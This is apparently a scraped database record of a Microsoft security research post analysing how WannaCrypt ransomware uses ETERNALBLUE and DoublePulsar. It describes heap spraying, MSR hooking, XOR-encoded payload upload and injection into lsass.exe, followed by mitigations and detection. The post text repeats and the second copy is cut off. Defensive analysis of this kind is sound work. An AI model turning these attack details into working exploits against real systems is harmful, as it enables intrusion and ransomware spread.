hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). 
WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n![Figure 1. Infection cycle overview](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-01.-Infection-cycle-overview.png)\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. 
Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n![Figure 2. Shellcode heap-spraying packet](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-02.-Shellcode-heap-spraying-packet.png)\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. 
More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n![Figure 3. First-stage shellcode for x86 systems](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-03.-First-stage-shellcode-for-x86-systems.png)\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n![Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-04.-Original-IA32_SYSENTER_EIP-value-pointing-to-KiFastCallEntry.png)\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n![Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-05.-Modified-IA32_SYSENTER_EIP-value-points-to-the-main-shellcode.png)\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. 
It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n![Figure 6. Master XOR key generation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-06.-Master-XOR-key-generation.png)\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n![Figure 7. Copying packet-handler shellcode and overwriting the dispatch table](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-07.-Copying-packet-handler-shellcode-and-overwriting-the-dispatch-table.png)\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n![Figure 8. Substitution of 0xe command handler](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-08.-Substitution-of-0xe-command-handler.png)\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n![Figure 9. Code that returns original XOR key](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-09.-Code-that-returns-original-XOR-key.png)\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. 
The shuffling algorithm basically looks like the following Python code.\n\n![Figure 10. XOR bit-shuffling code](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-10a.-XOR-bit-shuffling-code.png)\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n![Figure 11. SMB Transaction2 packet showing payload upload operation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-11a.-SMB-Transaction2-packet-showing-payload-upload-operation.png)\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n![Figure 12. Decoding and executing shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-12a.-Decoding-and-executing-shellcode.png)\n\n_Figure 12. 
Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n![Figure 13. Resolved kernel functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-13a.-Resolved-kernel-functions.png)\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n![Figure 14. RWX memory allocation through ZwAllocateVirtualMemory](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-14a.-RWX-memory-allocation-through-ZwAllocateVirtualMemory.png)\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n![Figure 15. APC routines for injecting shellcode to a thread in a userland process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-15a.-APC-routines-for-injecting-shellcode-to-a-thread-in-a-userland-process.png)\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. 
The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n![Figure 16. Bootstrap DLL functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-16c.-Bootstrap-DLL-functions.png)\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n![Figure 17. Dropping main payload to file system](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-17a.-Dropping-main-payload-to-file-system.png)\n\n_Figure 17. Dropping main payload to file system_\n\n![Figure 18. Creating the main payload process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-18a.-Creating-the-main-payload-process.png)\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. 
Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. 
Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n![Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-19a.-Windows-Defender-ATP-detection-of-an-anomalous-process-spawned-from-a-system-process.png)\n\n_Figure 19. 
Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], 
"type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "2b0d7fef6fac596fbf0a24d74105d3456d00af17666278279f3b59cd5c45fdc8", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "4e457e516171c49f292e8aa2146ca307", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "63a4a976f3c89eaa70e50a2c25ba2834", "key": "modified"}, {"hash": "f0bf0c408802a9b71e13a50fb429713c", "key": "title"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "63a4a976f3c89eaa70e50a2c25ba2834", "key": "published"}, {"hash": 
"896dd514d3c2f23798f33d98b9b71e55", "key": "description"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-06-30T13:00:00", "objectVersion": "1.5", "published": "2017-06-30T13:00:00", "references": [], "reporter": "msft-mmpc", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "viewCount": 1019}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}], "modified": "2017-06-30T13:00:00", "lastseen": "2017-09-15T09:08:41", "published": "2017-06-30T13:00:00", "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. 
The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n![Figure 1. Infection cycle overview](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-01.-Infection-cycle-overview.png)\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. 
Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n![Figure 2. Shellcode heap-spraying packet](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-02.-Shellcode-heap-spraying-packet.png)\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. 
More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n![Figure 3. First-stage shellcode for x86 systems](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-03.-First-stage-shellcode-for-x86-systems.png)\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n![Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-04.-Original-IA32_SYSENTER_EIP-value-pointing-to-KiFastCallEntry.png)\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n![Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-05.-Modified-IA32_SYSENTER_EIP-value-points-to-the-main-shellcode.png)\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. 
It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n![Figure 6. Master XOR key generation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-06.-Master-XOR-key-generation.png)\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n![Figure 7. Copying packet-handler shellcode and overwriting the dispatch table](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-07.-Copying-packet-handler-shellcode-and-overwriting-the-dispatch-table.png)\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n![Figure 8. Substitution of 0xe command handler](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-08.-Substitution-of-0xe-command-handler.png)\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n![Figure 9. Code that returns original XOR key](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-09.-Code-that-returns-original-XOR-key.png)\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. 
The shuffling algorithm basically looks like the following Python code.\n\n![Figure 10. XOR bit-shuffling code](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-10a.-XOR-bit-shuffling-code.png)\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n![Figure 11. SMB Transaction2 packet showing payload upload operation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-11a.-SMB-Transaction2-packet-showing-payload-upload-operation.png)\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n![Figure 12. Decoding and executing shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-12a.-Decoding-and-executing-shellcode.png)\n\n_Figure 12. 
Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n![Figure 13. Resolved kernel functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-13a.-Resolved-kernel-functions.png)\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n![Figure 14. RWX memory allocation through ZwAllocateVirtualMemory](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-14a.-RWX-memory-allocation-through-ZwAllocateVirtualMemory.png)\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n![Figure 15. APC routines for injecting shellcode to a thread in a userland process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-15a.-APC-routines-for-injecting-shellcode-to-a-thread-in-a-userland-process.png)\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. 
